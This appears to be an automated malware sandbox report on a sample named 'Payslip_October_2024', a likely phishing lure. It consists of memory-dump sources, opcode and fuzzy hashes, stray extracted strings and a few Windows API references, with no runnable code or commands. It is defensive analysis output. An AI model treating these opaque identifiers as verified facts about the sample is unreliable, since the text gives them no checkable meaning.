                                                                                                            • Opcode ID: e13f02ebbf3e1f301c2e148ccf1e96c71c3337df824c818664dd5e455a5e5d28
                                                                                                            • Instruction ID: 6192ee1793ac97bbb5713d7eb008b45c28e9aa1c92f21bb4cd18aaa4f254a7f0
                                                                                                            • Opcode Fuzzy Hash: e13f02ebbf3e1f301c2e148ccf1e96c71c3337df824c818664dd5e455a5e5d28
                                                                                                            • Instruction Fuzzy Hash: 2CE1F874E102298FDB14EFA9C6909AEFBF2BF89304F248569D419AB355D730AD41CF60
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1682385509.000000000E580000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E580000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e580000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 02d76b32452c35833d25a35d44b75b476eea524a83f27f1ac9d6b64095f515c5
                                                                                                            • Instruction ID: 24c63c49f37905489d3292579b456932a188ee89953e12f38cf1d53b696935e3
                                                                                                            • Opcode Fuzzy Hash: 02d76b32452c35833d25a35d44b75b476eea524a83f27f1ac9d6b64095f515c5
                                                                                                            • Instruction Fuzzy Hash: 34E10774E001198FDB14DFA9C6909AEFBF2BF89304F248569D419AB355D730AD45CF60
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1682385509.000000000E580000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E580000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e580000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: dafd8e82a71c8b6eb2ea317fe40ec23269bdd34601630a5abab47c28c180d221
                                                                                                            • Instruction ID: 75f952f9e03653e37176cddf9aed1fab690471896d401173b1112b5881c09756
                                                                                                            • Opcode Fuzzy Hash: dafd8e82a71c8b6eb2ea317fe40ec23269bdd34601630a5abab47c28c180d221
                                                                                                            • Instruction Fuzzy Hash: C9E10874E016198FDB14EFA9C6909AEFBF2BF89304F248569D415AB356C730AD42CF60
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1682385509.000000000E580000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E580000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e580000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f29bf2ea322e3bc8be8c4d54d53b66af0d65d541762568b2341f0981f7c0ec96
                                                                                                            • Instruction ID: 280785f2dbd83898c346991e87aaeee555c78282f14d79311724b80066c1d394
                                                                                                            • Opcode Fuzzy Hash: f29bf2ea322e3bc8be8c4d54d53b66af0d65d541762568b2341f0981f7c0ec96
                                                                                                            • Instruction Fuzzy Hash: 60E1F874E001198FDB14EFA9C5909AEFBF2BF89304F248569D419AB395D730AD45CF60
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1682385509.000000000E580000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E580000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e580000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 679c1886ad978e3443eb493cad87872899e402e6fe576efee035b8dd8281f350
                                                                                                            • Instruction ID: 6205cd59d00f96b797df58245d3c3a50450c4841ba3f5117d24a8e551f6fce9c
                                                                                                            • Opcode Fuzzy Hash: 679c1886ad978e3443eb493cad87872899e402e6fe576efee035b8dd8281f350
                                                                                                            • Instruction Fuzzy Hash: 9FE11974E016298FDB14DFA9C6809AEFBF2BF89304F248569D419AB355D730AD42CF60
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1680965006.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_74a0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: aac1c5ed3ba604ff3ec1bb062c36a13eab08c4ec6959d1485e4b1670d022b8ad
                                                                                                            • Instruction ID: a3f0db616268c8ce2ab23d8fdff2c153755d22a9f99a25cea98356ce07c753d8
                                                                                                            • Opcode Fuzzy Hash: aac1c5ed3ba604ff3ec1bb062c36a13eab08c4ec6959d1485e4b1670d022b8ad
                                                                                                            • Instruction Fuzzy Hash: EC717EB5E052189FCB04DFAAC5849DEFBF2BF98300F14C56AD418AB255D734A942CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1680965006.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_74a0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c6d1385db5a9dd50b590248dad8c775235236c2afa759f0e5182e72af50feb56
                                                                                                            • Instruction ID: b5530674770d8846bb1eab95ea70c3f7d9cadba9bedf24cd6028d0711f791197
                                                                                                            • Opcode Fuzzy Hash: c6d1385db5a9dd50b590248dad8c775235236c2afa759f0e5182e72af50feb56
                                                                                                            • Instruction Fuzzy Hash: 1B51D5B8E19209EFCB04CF9AD5445EDBBFAAB9E310F149426E419B7221D7309946CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1682385509.000000000E580000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E580000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e580000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9e54399d62f80f0e54cdecfa7bae675d80b5946b235f7117ccb1c577a32c4b3c
                                                                                                            • Instruction ID: 7d03fd961e748da98352c1be86f33e07e60845057dc30071f380e9912fab2ee7
                                                                                                            • Opcode Fuzzy Hash: 9e54399d62f80f0e54cdecfa7bae675d80b5946b235f7117ccb1c577a32c4b3c
                                                                                                            • Instruction Fuzzy Hash: F7512770E002298FDB14DFA9C5905AEBBF2BF89304F24C569D418AB256D730AD42CBA1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1682385509.000000000E580000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E580000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e580000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 099efbce37c52fc77a12b24e544cb6591d10e39b36906fddf05d9f08fa6ca92d
                                                                                                            • Instruction ID: 6c337b39eb827d75ccbf5b41be4c858825f252aab0e2589111f57955ea49e471
                                                                                                            • Opcode Fuzzy Hash: 099efbce37c52fc77a12b24e544cb6591d10e39b36906fddf05d9f08fa6ca92d
                                                                                                            • Instruction Fuzzy Hash: CC513A74E016298FDB14DFA9C6805AEFBF2BF89304F248569D418AB356D7319D42CFA0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1682385509.000000000E580000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E580000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e580000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6a1ab7e8dfd8f9f4c7fd123a18a1aaa803f52b4352002563557550c878e90c8d
                                                                                                            • Instruction ID: cd1540f2f5ecc42363438ae0ca4ee0625ed890b8b130edf9af52140101f2a1ec
                                                                                                            • Opcode Fuzzy Hash: 6a1ab7e8dfd8f9f4c7fd123a18a1aaa803f52b4352002563557550c878e90c8d
                                                                                                            • Instruction Fuzzy Hash: CC510674E002298BDB14DFAAC5805AEBBF2BF89304F24C569D419AB356D7319D42CFA1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1680965006.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_74a0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 481c6146709f1390dc4c3f427ec0d260dc11ff9f2698dd9dd8a1bcdbb945b00a
                                                                                                            • Instruction ID: 8533670988afddc82b04ac473e833465061fcb39b9def82c68d6a2ce20ee6965
                                                                                                            • Opcode Fuzzy Hash: 481c6146709f1390dc4c3f427ec0d260dc11ff9f2698dd9dd8a1bcdbb945b00a
                                                                                                            • Instruction Fuzzy Hash: 525162B5E006199FDB08DFAAC9845DEFBF2BF88300F14C16AD419AB354DB34A9428F50

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:10.4%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:136
                                                                                                            Total number of Limit Nodes:18

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-2392861976
                                                                                                            • Opcode ID: 694c603dbfb5fde666cc4da1a6708f90b283fcb68c4752db82325d3421f5dbef
                                                                                                            • Instruction ID: ee597d58243042586e4d1c6342c47e7aa9cf979ef45bf04011151911fcffc5dd
                                                                                                            • Opcode Fuzzy Hash: 694c603dbfb5fde666cc4da1a6708f90b283fcb68c4752db82325d3421f5dbef
                                                                                                            • Instruction Fuzzy Hash: 17321F31E1071A8FCB54EF75C85469DB7B6BF89300F6486AAD409AB314EB30AD85CF81

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q
                                                                                                            • API String ID: 0-355816377
                                                                                                            • Opcode ID: 3311b8f5878489577d8cb4d06682c956e50fe795b45a24eb5c1a903651a0ae7d
                                                                                                            • Instruction ID: 50227af3966d4f5bee234de3c8509f72eab337d8cb0f3f66d04d0290f8cf5652
                                                                                                            • Opcode Fuzzy Hash: 3311b8f5878489577d8cb4d06682c956e50fe795b45a24eb5c1a903651a0ae7d
                                                                                                            • Instruction Fuzzy Hash: 5802AC30B006269FDB54DF64D894AAEB7E2FF84304F148569E40ADB385DB31EC86CB91
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $
                                                                                                            • API String ID: 0-3993045852
                                                                                                            • Opcode ID: 965d1869e89af9e0272cb757c11062c2734a01956e7e2eaf6cde326584039074
                                                                                                            • Instruction ID: 5685c63266669bc903448a7ad7c8b8dabce4f0d25a103c2c1fe599fb1fd09871
                                                                                                            • Opcode Fuzzy Hash: 965d1869e89af9e0272cb757c11062c2734a01956e7e2eaf6cde326584039074
                                                                                                            • Instruction Fuzzy Hash: D322B371E006269FDF64DF64C4846AEBBF2EF85310F20846AD44AEB345DA35ED42CB91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: dcacc67238b91cf969dcda2e07d1919e81a86574da5819a01117de30a7fb50ec
                                                                                                            • Instruction ID: 2f2ecc6bc6a9914e755e5b8ae0506de169fbdeced215ef47e166472aa8e5ed10
                                                                                                            • Opcode Fuzzy Hash: dcacc67238b91cf969dcda2e07d1919e81a86574da5819a01117de30a7fb50ec
                                                                                                            • Instruction Fuzzy Hash: ADA25534A006298FDB64CB68C594B9DBBF2FB49314F1484AAE449EB361DB34ED85CF41
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7740663c1c6401b6c3888b47a9f1719959da41606b4525fc88ac3c229266fe3b
                                                                                                            • Instruction ID: d20ca2a1ac09b1aca8308f3e62d7d7edd9eeba44434b0aa03813ccedb524a620
                                                                                                            • Opcode Fuzzy Hash: 7740663c1c6401b6c3888b47a9f1719959da41606b4525fc88ac3c229266fe3b
                                                                                                            • Instruction Fuzzy Hash: 4D62AD34A006268FDB54DB68D594BAEBBF2EF84314F148469E80ADB351DB35EC46CF81
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9327e5ab09bfbe479e863e9d3221ad71191d642b38e64904b2862475ac791d22
                                                                                                            • Instruction ID: 111146851bd749390e537f3d4b04eeec1da5a85c04dae8338333a395a4daceb5
                                                                                                            • Opcode Fuzzy Hash: 9327e5ab09bfbe479e863e9d3221ad71191d642b38e64904b2862475ac791d22
                                                                                                            • Instruction Fuzzy Hash: 10226170E1052A8FDF64DB68D4847ADB7F1EB89314F248826E419DB395DA34DC81CF52

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-3823777903
                                                                                                            • Opcode ID: 538ae846aa1e26527bee2b2fb50ab10b3e9ca277d9e499807b909e3e8e52ca3b
                                                                                                            • Instruction ID: 2f2db2ab81b59182b4ace0dd21475f41ee9e4ff7dab11503f97cdbaceefd79a6
                                                                                                            • Opcode Fuzzy Hash: 538ae846aa1e26527bee2b2fb50ab10b3e9ca277d9e499807b909e3e8e52ca3b
                                                                                                            • Instruction Fuzzy Hash: 81E16D70E1062A8FCB65DFA8D4846AEB7F2EF84304F148929E41ADB345DB74DC46CB81

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-2392861976
                                                                                                            • Opcode ID: 696f2ef3d5118ff353007762984ae788a5b2e906df1274abce51cf4b9371f2ed
                                                                                                            • Instruction ID: 9c5059a0644f676350d48f118fe7ec0145aa1d26e3f0eb710f9b2f17dcb2efc8
                                                                                                            • Opcode Fuzzy Hash: 696f2ef3d5118ff353007762984ae788a5b2e906df1274abce51cf4b9371f2ed
                                                                                                            • Instruction Fuzzy Hash: C8027B30E1062A8FDB64CF68D480AADB7F2EB45318F14896AE419DB355DB35ED81CF81

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-2125118731
                                                                                                            • Opcode ID: f2d2a35b66d4c499d1876622200ee59862a676d22999d6ea45b8ff9a1b9b064b
                                                                                                            • Instruction ID: 0fa6b77bb44fe14e967b8ae3a20dce7c6b488da2faaa28d7953b2e23f31d01f4
                                                                                                            • Opcode Fuzzy Hash: f2d2a35b66d4c499d1876622200ee59862a676d22999d6ea45b8ff9a1b9b064b
                                                                                                            • Instruction Fuzzy Hash: 3B916E70B1061A8FDB54EB69D8507AEB3F6AFC9304F10856AD40EEB344EB709D468F91

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q
                                                                                                            • API String ID: 0-831282457
                                                                                                            • Opcode ID: 974266f11609556095abb6bc81f5a59aa286a96ed366dc73992ba4e4e2c33783
                                                                                                            • Instruction ID: d388c8b615f6c8b2e875825da2fdf34788903d93dd47f9e56ea614859928a56f
                                                                                                            • Opcode Fuzzy Hash: 974266f11609556095abb6bc81f5a59aa286a96ed366dc73992ba4e4e2c33783
                                                                                                            • Instruction Fuzzy Hash: 72626F30A007268FCB15EF68D590A5DB7F2FF84309B248A69D0099F759EB71ED46CB81

                                                                                                            Control-flow Graph

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (bq$(bq$(bq
                                                                                                            • API String ID: 0-2716923250
                                                                                                            • Opcode ID: ed798bed3f1838e3e4666af42e8d3b175e2fe7e0a3764fb244d145fe7c8a703b
                                                                                                            • Instruction ID: 1d1069cc4060e5572d4b9cf8d690f6aec1e6c443944ae32834b9968ade7a6ef2
                                                                                                            • Opcode Fuzzy Hash: ed798bed3f1838e3e4666af42e8d3b175e2fe7e0a3764fb244d145fe7c8a703b
                                                                                                            • Instruction Fuzzy Hash: 3ED19D74E003099FDB04DFA9C9546AEBBF2FF89310F148569D449AB392DB34AD42CB91

                                                                                                            Control-flow Graph

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: fcq$XPcq$\Ocq
                                                                                                            • API String ID: 0-3575482020
                                                                                                            • Opcode ID: 71259c34711c0bf77d71df2605ccc6d17e7ae4ad2437acb560d37d2e8ae39d41
                                                                                                            • Instruction ID: 179f11eb9a0bbf8e413fedbc360b5f1b00a682dc551cb12c34d5ee6edea1274e
                                                                                                            • Opcode Fuzzy Hash: 71259c34711c0bf77d71df2605ccc6d17e7ae4ad2437acb560d37d2e8ae39d41
                                                                                                            • Instruction Fuzzy Hash: 01616F30F002199FEB559FA8C8557AEBBF6EB88700F20842AE106AB395DF754D458F91

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,0562B075), ref: 0562B0FF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4142395831.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_5620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CallbackDispatcherUser
                                                                                                            • String ID: D .s
                                                                                                            • API String ID: 2492992576-3480518460
                                                                                                            • Opcode ID: 7f757f4a3b66aad8c11c8096896012a657728556d7ed9c69d2843a2691d912ec
                                                                                                            • Instruction ID: 28d18e59a1d76613595cc78f402c39a720ad4336f4e05f537a55814b92012bd6
                                                                                                            • Opcode Fuzzy Hash: 7f757f4a3b66aad8c11c8096896012a657728556d7ed9c69d2843a2691d912ec
                                                                                                            • Instruction Fuzzy Hash: 891125B58047598FCB20DF9AC889B9EBBF4EB49324F20845AD519A3351C375A944CFA1

                                                                                                            Control-flow Graph

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: nKvq$nKvq
                                                                                                            • API String ID: 0-2223595353
                                                                                                            • Opcode ID: 51c3ccc7af51f89f821701d862773a44e2a52bd1dbdcbe5ffbbe6edf49f6ed18
                                                                                                            • Instruction ID: 3cbdd02aed7ca669d41ff2e366eaccb0c7e7817244f94a3d52ac4ecc2bd2f08a
                                                                                                            • Opcode Fuzzy Hash: 51c3ccc7af51f89f821701d862773a44e2a52bd1dbdcbe5ffbbe6edf49f6ed18
                                                                                                            • Instruction Fuzzy Hash: B6B13B75E006068FCB18DF68C4909AEF7B2BF88310B168695E9556B356DB30FD82CBD1

                                                                                                            Control-flow Graph

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: nKvq$nKvq
                                                                                                            • API String ID: 0-2223595353
                                                                                                            • Opcode ID: c093488610f904467c3ed958fbf7b41de8488ff6be5dc48fe39450242ec6b7f2
                                                                                                            • Instruction ID: 37c0f1450fac7145a6540ca3799ccd6d10a659f3dfa5e946f0f3949068a91cf1
                                                                                                            • Opcode Fuzzy Hash: c093488610f904467c3ed958fbf7b41de8488ff6be5dc48fe39450242ec6b7f2
                                                                                                            • Instruction Fuzzy Hash: 58B12975E006068FCB08DF58C4909AEF7B2BF88310B168695E945AB356DB30FD82CBD1

                                                                                                            Control-flow Graph

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q
                                                                                                            • API String ID: 0-355816377
                                                                                                            • Opcode ID: e240674a131bfb5244c0eb2015ea5a2ecdf4e0037fbc65bb5ee2988526e57f81
                                                                                                            • Instruction ID: 2f3604ff0134d45aeea4c97e7419bdb99f1509ba504a8ef30a34ac371140928f
                                                                                                            • Opcode Fuzzy Hash: e240674a131bfb5244c0eb2015ea5a2ecdf4e0037fbc65bb5ee2988526e57f81
                                                                                                            • Instruction Fuzzy Hash: A1515070B101169FDB54EB79D990B6EB3F6AFC8304F14856AD40ADB388EA30DC428F95

                                                                                                            Control-flow Graph

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: fcq$XPcq
                                                                                                            • API String ID: 0-936005338
                                                                                                            • Opcode ID: 7aa56577ddf054e14fea172baf68ee16851c08f6173071f08e25569c379df6f1
                                                                                                            • Instruction ID: baae05744e288fc0df4931bd74bbd0824964f1bf3d5a9f378011a8367a77848d
                                                                                                            • Opcode Fuzzy Hash: 7aa56577ddf054e14fea172baf68ee16851c08f6173071f08e25569c379df6f1
                                                                                                            • Instruction Fuzzy Hash: DF518D70F002199FEB45DFA9C8557AEBBF6EF88700F20842AE145AB395DE748C018B91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4120922070.0000000000C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C70000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_c70000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ad3f07c3985b851aadd959dabf37131280d0ed1cb0add8098a59006d1c43581c
                                                                                                            • Instruction ID: 9e119230dc11c93bc9e1e17107ffe60e1850e36a30b3cf7bcd45a38e9b62a430
                                                                                                            • Opcode Fuzzy Hash: ad3f07c3985b851aadd959dabf37131280d0ed1cb0add8098a59006d1c43581c
                                                                                                            • Instruction Fuzzy Hash: 41413672D003558FCB00CFB9D80879EBBF1EF89310F0586AAD418A7791DB789945CB90
                                                                                                            APIs
                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 056260EA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4142395831.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_5620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 716092398-0
                                                                                                            • Opcode ID: 7212e7b8f6a62eb3d129ce5bc02aefd19481495d9dd14d541b19984c40f937df
                                                                                                            • Instruction ID: 56956aa199655db5099c3d90c8de96bf8f70b256fd0a49c35a38b8e137e290f3
                                                                                                            • Opcode Fuzzy Hash: 7212e7b8f6a62eb3d129ce5bc02aefd19481495d9dd14d541b19984c40f937df
                                                                                                            • Instruction Fuzzy Hash: F451BFB1D00319DFDF14CF9AC984ADEBBB5BF48314F24812AE419AB210DB75A945CF91
                                                                                                            APIs
                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 056260EA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4142395831.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_5620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateWindow
                                                                                                            APIs
                                                                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 0562AE29
                                                                                                            Memory Dump Source
